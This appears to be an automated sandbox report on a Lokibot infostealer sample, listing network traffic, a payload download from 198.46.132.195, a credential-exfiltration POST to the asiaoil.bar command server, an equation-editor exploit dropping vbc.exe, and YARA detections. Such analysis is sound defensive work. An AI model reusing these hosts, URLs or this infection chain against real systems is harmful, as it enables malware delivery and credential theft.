              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wCsqQDtUNyAdb8N7QE5gpRV6yQp9OM5kLzcDr7AlwMrEbZXvVwvalAee7gk3yYD6lCHsuYIHi9jPPTnfADT3Vv66t86Ej5Rk3p%2BU8OrA6dwgCuh8u7DexDMJSkMrXQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db447381a755be1-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SRqidrs3tVmZaXWczrmKsgbZ4wzW0DNHNg57GTGmubIkUghb%2BRZ87SXRzbz4C2tAAPiS7VjMUqurezvKjUarwJZfb4vQq5PhgZ3zf0wd8HEEhwN0s6BL9vHZrcRCQA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4473f0b3b9208-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wh%2FHtCJ%2F5r2bJkgiHao050klrqU1roeJfG%2B4i6f3I%2FKeYPkYarG1akcmrjP1MjieW7NO3IUngd6ffdEn3ApGf%2BloKJJBXuiDKbgTzbof4laU14sUbhPRo%2BZeW2t2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db44745a96792b9-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4ZOuSqnAuokRLt6j%2BaPucUYURpspSs5959QwqxEaaI65vhxihU%2BSGTldehqd66BkHEec1wRdP8eKXsiuAfROg4bLz4JgpMIkfQ1aSuC9Jn%2BKCRCMyVVG8exy0%2Ffc7A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db447528eb59094-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jDOcGscIXoe9amgDgblodsrhn0vmrU90jrXpu8eubmt%2FtVJmc0fEBfOASTLuxQbUt3Vyn6AzRV98aodD8X4wZ0aRqf1etGTdsv2KXeP8MDKpOfZ2KmYTIdqKCEQiTg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4475c4e69691b-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2nROjTYrKHq5Dp3zfqoq%2BF08OA0sabm52jF3F7aFN8zXdi%2BsX6Cq%2F1PGMTUNOdZpDBwGOKpy%2F6346z2Ex7OMyy0ds2Scyrm%2B5L4uaz1G2nfp7WA5GPCq2oiQAJpM6A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db44762ced16963-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=d88FAJAIS01MD7fqAfBFKZ2BhmJxCoOv1Hl6%2FrHHy0nAp1VZ0UmTp2mncxvNOP61QK0xudgAXXNSW%2FHEuL5DLwigS1D%2BHfHJsx5oxzhN7qOtYp8JjADI7dRG6jZTLw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db447690f816969-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=y4ckWSdyfKKgK%2FaSnEtfcnQkctDbfArW85YmMzuF2GYtn1Vk9z3zezqrAQm97NN4dlNgg4mlDR6cFowQrcAInwiWKaPPKhv22VNGu%2Fi7%2FjbZEoNLKbqtK0TOhixPTw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4476f3c7c9072-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Mk%2F%2ByckUn75h6rICqGx9cpJuG7dAjWTNBLmPAr%2FZWuFMh6m%2Fl%2FaMElHYxT54c74Wcf%2BgX9vcoEDADUlGA5wqWcrwO%2B3jiZphR9HdBO0OgJ1mWc%2FTatA77PboqFA%2F%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db447759aa39113-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lkoFlBzh%2FTvOS8G5hZ5h6dPK6YATM%2FnTao2RMMscPCKdFKdF3yBO98Mj55rUC%2BFjMzMKlTeqOz7aj%2Fqw04UBHUPGJ1ayR49HyEd8ogh8KcYhkHXG20zdKy28pHBuBA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4477c0a09694f-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6IjZw4UIYZGNBtRkEhw0RzPzggwNQkdD8cEShbMPEDVfqNl1bXjX9XB1t94CL9pCK1%2FBnfmx78Swjpa1RBrVYoWA186HoyYm1jceSa4D8bUv8CTvYDnbykWZ8ANQ%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db447827e0d5b92-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: vbc.exe, vbc.exe, 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.452029619.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, .win32[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: vbc.exe, 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.452029619.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, .win32[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: xmtxpy.exe, xmtxpy.exe, 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, xmtxpy.exe, 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: unknownHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 176Connection: close
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AB951BC.emfJump to behavior
              Source: unknownDNS traffic detected: queries for: asiaoil.bar
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_00404ED4 recv,
              Source: global trafficHTTP traffic detected: GET /windowSSH/.win32.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.132.195Connection: Keep-Alive
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.xmtxpy.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.2.xmtxpy.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Office equation editor drops PE file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exeJump to dropped file
              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.2.xmtxpy.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.2.xmtxpy.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
